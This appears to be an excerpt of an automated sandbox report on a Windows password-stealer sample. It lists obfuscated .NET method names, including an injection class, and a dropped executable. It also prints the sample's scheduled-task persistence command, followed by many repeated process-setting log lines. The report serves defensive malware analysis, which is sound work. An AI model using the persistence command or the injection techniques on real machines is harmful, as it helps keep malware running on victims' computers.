                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, JLNnh3fRY2JI2y2OJN.csHigh entropy of concatenated method names: 'A1AHGKQuBb', 'znyHu9wWGF', 'nXyHmjocTE', 'NOZHfjKQwo', 'fTeHrCR8pG', 'aHHHBh0ugJ', 'iB5H6VcOWw', 'hL4HvLX7Oh', 'u0dH042vfl', 'otUHVhaswq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, on1bXYpw5Dbt7hdRmA.csHigh entropy of concatenated method names: 'jI5jAjCsp', 'n4MGAO8y8', 'lKLu3MNcl', 'zgebgMICY', 'N9xfdKXkw', 'sitx1i0Ll', 'wK3r1VbqTIt5tiuQW8', 'SQrl8eM5xUsxDs6ssa', 'VLMv7dgJ3', 'o4eVT5g5a'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, sRcEy9COTwTCDIhElf.csHigh entropy of concatenated method names: 'eJYvlbRXO3', 'ifQvcQRBXp', 'iJfvHoAOC8', 'CUNv5Qn3OQ', 'Y1bvqBKdpY', 'pCbvX0TrET', 'ss7vyYGxcH', 'ppBvMvj5nX', 'HFpvneeUBa', 'WAxv2LNKH5'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, MpRDFV9vBfpQsVwLWj.csHigh entropy of concatenated method names: 'aqFrQfQgKJ', 'kZErdK5u6F', 'KgYr9fmW8V', 'Y1pr15Iaa4', 'Oc1rWdX656', 'MydrKEYhBH', 'HQIrFgDEd0', 'P6urtEsei6', 'Gl0rk2I74F', 'WsPrL85ksI'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, utOIZ6gREl3CLe8Wuc.csHigh entropy of concatenated method names: 'qbSqNrJ7hr', 'RoRqc0CcKI', 'RU4q5LUNF1', 'TUWqXx9ef6', 'JSVqyrfu5U', 'kNG5etL0tI', 'B295PpbTtm', 'Jxm5AFjrh8', 'gSP5Cdhj5c', 'MNs5whkM6i'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, XfKWYy7qoSjnocn2Mt.csHigh entropy of concatenated method names: 'O94XYZHcjr', 'X47XD1YLTJ', 'YLHXjfOs2r', 'FMVXGT1p6M', 'VyRXT44A0r', 'Q5xXuvGTdW', 'B9yXbYtbF3', 'GVvXmbeyAZ', 'kcWXf8hTTc', 'R9uXx8tKPn'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, FRpcSaPxFAS6APJwiL.csHigh entropy of concatenated method names: 'vZt6C9cFrE', 'F4J6ZmrGnO', 'NnbvatH592', 'hWPv44IDVX', 'G576iY7Bir', 'r7B6dtrD59', 'FsS6ErAqvc', 'vfN69Dl8MI', 'oYj61ddqAd', 'awF6OnjUEx'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AfUbALyC500FynBqvI.csHigh entropy of concatenated method names: 'adFUNab2jZ', 'WcnUlluGJ4', 'y7nUcJZChw', 'W9WUHKPyNM', 'vH5U5c3PMp', 'AnvUq5kUVi', 'vQgUXaYRU9', 'Q0uUyj96IC', 'S5qUMloObW', 'mhAUnu9DPI'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, f1PYmeE4fTIbqTOcMr.csHigh entropy of concatenated method names: 'bSQomyY0Rs', 'zyuoftb2np', 'DdLogIanfF', 'WFfoWSOW13', 'HEuoFkuIsC', 'JKDotqgu6i', 'rPQoLF19BS', 'gVso3BvOH6', 'oIUoQYeuAo', 'djCoi2l0ts'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, Y2xhaHzpVWr0qPqPe5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'roQ0oNhaND', 'lcA0r2LlDp', 'JmR0BjiLGy', 'r7j06otRwI', 'Rld0vHVUtW', 'u2W00jaLyM', 'vUR0VAneCa'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, uSWedTON0pZsaQDlE7.csHigh entropy of concatenated method names: 'ToString', 'iZ0BiQxM4I', 'q9fBW589D3', 'ClfBK3sN1E', 'voJBFrTTpT', 'dWcBtSjELU', 'bZFBkQ4i6N', 'r9gBLrNNRg', 'TrvB3jjSVx', 'sHnB7jH9XC'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, elDDp3HPIobioVFnqi.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YwKpwJPng2', 'S17pZGW9R2', 'I5bpzOhQuE', 'sDcUagCe6e', 'odeU4Rf2mD', 'rxXUpLgTRe', 'EssUUmSCYJ', 'bCWWOwWwyoxWFlxFFKx'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, M4CJD2cOceSjToPAu1.csHigh entropy of concatenated method names: 'Dispose', 'xhe4weBFJG', 'j8mpWwc3T2', 'cMP88Ct8gZ', 'p0R4ZcEy9O', 'BwT4zCDIhE', 'ProcessDialogKey', 'ffYpa9cqyC', 'LGFp4gxtdi', 'fSIppoAiv9'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AcxjPt4arkHdo90ERvm.csHigh entropy of concatenated method names: 'WHZ0Y7UAYp', 'jrI0DX47wT', 't560jFmNWg', 'Tdf0GVBV7U', 'E3V0Tm4ohL', 'dF00ut0IWl', 'pCS0beK32v', 'gfV0mi2gdM', 'JJh0fAhUNL', 'kIW0ximueC'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, B54uhvmGLlyX4pN6ow.csHigh entropy of concatenated method names: 'km7c9pvgod', 'uJQc1iuFU4', 'KY3cOURNCJ', 'SQ8c8g1akg', 'T3mce2YRgE', 'nhvcPQCilT', 'QJEcAHfxIT', 'inHcCRUX4X', 'tM8cwj5Tli', 'YGYcZPKRTh'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, fRACX4xPO18mSo9ekl.csHigh entropy of concatenated method names: 'Fev5TXYnxG', 'aYj5b2WIDw', 'JKtHKxoYAF', 'VbhHFwxNwF', 'hOYHtZK4TB', 'bYSHk2pKrb', 'EwgHLaLNrR', 'B63H39SR9M', 'OriH7W8Nnt', 'f7FHQUvLyg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, x9cqyCwLGFgxtdilSI.csHigh entropy of concatenated method names: 'XcRvghc9G9', 'pTRvW0XQGp', 'eifvKRW8v1', 'JTEvFmrXYI', 'L3dv9mcStw', 'dLZvtuncme', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, zXIgiB4p7fQ4TwLhUoH.csHigh entropy of concatenated method names: 'rp6VYRi78Y', 'UtQVDMbRuX', 'FBCVj9GjLv', 'CrENuxqmAvX5aN6qVXI', 'kB9XioqlMlTn2Bnlx4O', 'j3hP9mqU4NI7DPrbyEn', 'whYvyGqHoFbWlwooZIg', 'AsjXpGqhchxZPA5MwYJ'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, uOikXZRACP8fm5xu2c.csHigh entropy of concatenated method names: 'aTT4X54uhv', 'ALl4yyX4pN', 'LRY4n2JI2y', 'mOJ42NcRAC', 'o9e4rklstO', 'wZ64BREl3C', 'gcQpHNSptCWOA1KF2T', 'IMjPbHXN7HF8MSfHvM', 'DDqnfhK3LoRQZO0GN3', 's7n440L0DI'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, TR2kGu4UvRae0cmEBUc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kvSV9ZgSr9', 'syAV19mfbk', 'wLEVOhgnGP', 'yd4V89D8po', 'ETTVeuKvZc', 'yppVPVZwtT', 'Ah2VAbIqRm'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, nAiv9FZhRaIO79efY1.csHigh entropy of concatenated method names: 'gRN04fHUox', 'XGV0UkMy5P', 'kxH0RKSDmf', 'cQZ0lfhQ8E', 'JRW0cQOaaI', 'vEa0557Qof', 'rSE0q5rF74', 'PFHvA7gNGu', 'lZ4vCja3i0', 'FZavwxALT8'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, Pp43I3Lx3ZeQKe9E6s.csHigh entropy of concatenated method names: 'u6VXlU1R5c', 'J8nXHmrjgR', 'XR5Xqa2Wv1', 'RT8qZIhcVO', 'HEwqzFlFYv', 'EWSXaCQ2bt', 'wMQX4Bj2m7', 'A2kXpUOqa8', 'IvHXUL3aht', 'ho4XRXPJEB'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, JLNnh3fRY2JI2y2OJN.csHigh entropy of concatenated method names: 'A1AHGKQuBb', 'znyHu9wWGF', 'nXyHmjocTE', 'NOZHfjKQwo', 'fTeHrCR8pG', 'aHHHBh0ugJ', 'iB5H6VcOWw', 'hL4HvLX7Oh', 'u0dH042vfl', 'otUHVhaswq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, on1bXYpw5Dbt7hdRmA.csHigh entropy of concatenated method names: 'jI5jAjCsp', 'n4MGAO8y8', 'lKLu3MNcl', 'zgebgMICY', 'N9xfdKXkw', 'sitx1i0Ll', 'wK3r1VbqTIt5tiuQW8', 'SQrl8eM5xUsxDs6ssa', 'VLMv7dgJ3', 'o4eVT5g5a'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, sRcEy9COTwTCDIhElf.csHigh entropy of concatenated method names: 'eJYvlbRXO3', 'ifQvcQRBXp', 'iJfvHoAOC8', 'CUNv5Qn3OQ', 'Y1bvqBKdpY', 'pCbvX0TrET', 'ss7vyYGxcH', 'ppBvMvj5nX', 'HFpvneeUBa', 'WAxv2LNKH5'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, MpRDFV9vBfpQsVwLWj.csHigh entropy of concatenated method names: 'aqFrQfQgKJ', 'kZErdK5u6F', 'KgYr9fmW8V', 'Y1pr15Iaa4', 'Oc1rWdX656', 'MydrKEYhBH', 'HQIrFgDEd0', 'P6urtEsei6', 'Gl0rk2I74F', 'WsPrL85ksI'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, utOIZ6gREl3CLe8Wuc.csHigh entropy of concatenated method names: 'qbSqNrJ7hr', 'RoRqc0CcKI', 'RU4q5LUNF1', 'TUWqXx9ef6', 'JSVqyrfu5U', 'kNG5etL0tI', 'B295PpbTtm', 'Jxm5AFjrh8', 'gSP5Cdhj5c', 'MNs5whkM6i'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, XfKWYy7qoSjnocn2Mt.csHigh entropy of concatenated method names: 'O94XYZHcjr', 'X47XD1YLTJ', 'YLHXjfOs2r', 'FMVXGT1p6M', 'VyRXT44A0r', 'Q5xXuvGTdW', 'B9yXbYtbF3', 'GVvXmbeyAZ', 'kcWXf8hTTc', 'R9uXx8tKPn'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, FRpcSaPxFAS6APJwiL.csHigh entropy of concatenated method names: 'vZt6C9cFrE', 'F4J6ZmrGnO', 'NnbvatH592', 'hWPv44IDVX', 'G576iY7Bir', 'r7B6dtrD59', 'FsS6ErAqvc', 'vfN69Dl8MI', 'oYj61ddqAd', 'awF6OnjUEx'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AfUbALyC500FynBqvI.csHigh entropy of concatenated method names: 'adFUNab2jZ', 'WcnUlluGJ4', 'y7nUcJZChw', 'W9WUHKPyNM', 'vH5U5c3PMp', 'AnvUq5kUVi', 'vQgUXaYRU9', 'Q0uUyj96IC', 'S5qUMloObW', 'mhAUnu9DPI'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, f1PYmeE4fTIbqTOcMr.csHigh entropy of concatenated method names: 'bSQomyY0Rs', 'zyuoftb2np', 'DdLogIanfF', 'WFfoWSOW13', 'HEuoFkuIsC', 'JKDotqgu6i', 'rPQoLF19BS', 'gVso3BvOH6', 'oIUoQYeuAo', 'djCoi2l0ts'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.70d0000.13.raw.unpack, ReactionVessel.csHigh entropy of concatenated method names: 'CopyMemory', 'SearchResult', 'CausalitySource', 'K4oTsswVn', 'ComputeReaction', 'ResizeVessel', 'Inject', 'c6vkj3brm', 'Init', 'Init'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.30790cc.3.raw.unpack, ReactionVessel.csHigh entropy of concatenated method names: 'CopyMemory', 'SearchResult', 'CausalitySource', 'K4oTsswVn', 'ComputeReaction', 'ResizeVessel', 'Inject', 'c6vkj3brm', 'Init', 'Init'
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeFile created: C:\Users\user\AppData\Roaming\lnYkIr.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
